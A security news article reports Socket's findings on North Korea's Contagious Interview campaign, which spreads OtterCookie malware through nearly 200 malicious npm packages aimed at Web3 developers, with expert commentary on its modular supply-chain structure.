A security alert has been issued by software security firm Socket, revealing that North Korean threat actors have dramatically escalated their ongoing Contagious Interview attack. They are now flooding the popular software platform npm registry, where JavaScript developers share and download code, with nearly 200 new malicious packages since October 10, 2025. The attack targets blockchain and Web3 developers through fake job interviews and “test assignments,” Socket’s investigation found.
Further probing revealed that these new malicious packages have already been downloaded over 31,000 times, and are designed to secretly install the dangerous OtterCookie malware.
This campaign follows earlier Contagious Interview attacks covered by Hackread.com, including a 2024 report on the campaign (also called Eager Crypto Beavers) where the Lazarus Group used fake job offers and malicious video conferencing apps (like FCCCall) to distribute the BeaverTail malware.
In April 2025, Silent Push also linked this campaign to the Lazarus Group, detailing their use of AI-generated employee images and fake companies (BlockNovas LLC) to lure job seekers. Cisco Talos later found evidence that BeaverTail has merged its functions with OtterCookie. Socket’s discovery confirms the attackers are continuing this campaign, deploying the same malware family.
According to Socket’s blog post, the attackers use a clever, multi-part system to deliver their malware. First, they disguise malicious code packages (like tailwind-magic, node-tailwind, and react-modal-select) on the npm registry, appearing like harmless utility tools. When a victim installs a fake package, it secretly reaches out to a temporary online storage spot on Vercel (tracked as tetrismicvercelapp) to launch the next part of the attack.
This Vercel site then fetches the final, malicious code from a hidden account on GitHub (specifically, one tracked as stardev0914, which had 18 repositories and has since been removed). The infrastructure relies on a separate server (tracked by the IP address 144.172.104.117) to handle data collection once a machine is compromised.
It is worth noting that attackers use fake projects, including a cloned version of a crypto-themed website, as lures to make the malicious packages seem legitimate.
OtterCookie (a variant of BeaverTail) is designed to steal a massive amount of personal data. Right after infecting the victim’s computer, it first checks if it’s being analysed by security experts and, if everything looks clear, it connects back to the hackers’ server.
This connection gives the attackers what the report calls a “remote shell,” basically letting them take control of the infected machine from afar. The multi-feature malware then starts its job, including continuously stealing anything copied to the clipboard, keylogging, capturing screenshots, and scanning for valuable documents. It also hunts for browser credentials and cryptocurrency wallet data across Windows, macOS, and Linux computers.
“This sustained tempo makes Contagious Interview one of the most prolific campaigns exploiting npm,” Socket’s Threat Research Team concluded.
Security experts, who reviewed Socket’s research, shared their comments exclusively with Hackread.com, emphasising how organised and persistent this North Korean operation is.
Collin Hogue-Spears, Senior Director of Solution Management at Black Duck, noted that the campaign is highly structured and professional. He stated, “Contagious Interview is an industrialised software supply chain campaign, not a one-off backdoor.”
He highlighted how the hackers use GitHub for source control, Vercel for payload staging, npm for distribution, and a separate C2 tier for exfiltration, showing the modular nature of the attack. Hogue-Spears warned that a malicious ‘take-home test’ can give attackers “the access that an insider would have, without ever appearing on your payroll.”
Randolph Barr, Chief Information Security Officer at Cequence Security, echoed this sentiment, pointing out that the attackers are imitating legitimate development teams. He observed, “It seems just like a simplified software development lifecycle, but for malware instead of product features.” He stressed that these attackers “can send out malicious updates on a large scale with relatively little trouble” by using open developer systems.
Jason Soroko, Senior Fellow at Sectigo, supported this comparison, saying the term “simplified software development lifecycle for malware is accurate in spirit.” He noted that the operators prioritise patterns that “maximise agility and survivability,” such as separating delivery from the payload and rapidly cloning the same core malware into many lures.
